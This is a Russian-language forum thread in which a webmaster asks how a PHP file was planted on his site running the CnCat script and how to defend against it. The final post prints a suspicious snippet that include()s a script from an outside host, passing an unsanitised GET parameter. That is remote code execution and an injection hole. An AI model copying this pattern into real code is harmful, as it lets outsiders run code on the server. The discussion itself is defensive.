Уязвимость CnCat

[lunux]

Уязвимость CnCat

Очень интересно услышать любое мнение, а то недавно каким то образом подкинули PHP файл который может создавать свои файлы...

 

[slach]

=) ну ты сначала дай ссылки что такое CnCat ?

 

[lunux]

Автор оригинала: slach
=) ну ты сначала дай ссылки что такое CnCat ?

http://www.cn-software.com/?cncat

 

[SiMM]

> http://www.cn-software.com/?cncat
А при чём там CnCat? Вижу CNStats и CNSearch Pro - больше ничего.
А вообще - http://www.cn-software.com/support.xhtm

 

[lunux]

http://www.cn-software.com/download.xhtm там есть бесплатная версия, сапорт обслуживает платников.

Ди и тут дело даже не в том, вопрос такой:

"Можно ли загрузить файл на сервер не имея к нему доступа если реально в скрипте нигде не участвует fopen и т.п."?

 

[SiMM]

А при чём тут fopen? Можно. Если в скриптах реализован upload файлов.

 

[lunux]

а если не реализован?

 

[PROman]

Автор оригинала: SiMM
А при чём тут fopen? Можно. Если в скриптах реализован upload файлов.

Тоже можно

 

[lunux]

а как именно, я хочу защититься хотя бы чуть чуть от таких посягательств ... понятное дело от всего не спасёшся, но хоть что-то 8(

 

[PROman]

ну тогда тебе в http://phpclub.ru/detail/ читать статьи с раздела "Вопросы безопасности"

 

[lunux]

Интересный нюанс:

ini_set('error_reporting','E_ERROR');
$page = $HTTP_GET_VARS['page'];
$url = "http://" . $HTTP_SERVER_VARS['HTTP_HOST'] . $HTTP_SERVER_VARS['REQUEST_URI'];
$site =1762;
include("http://www.tower.mhost.ru/coder.php?site=".$site."&page=".$page."&ppage=5&url=".urlencode($url));

Чую что по средствам параметра как как то впихнули файл, но как непойму :?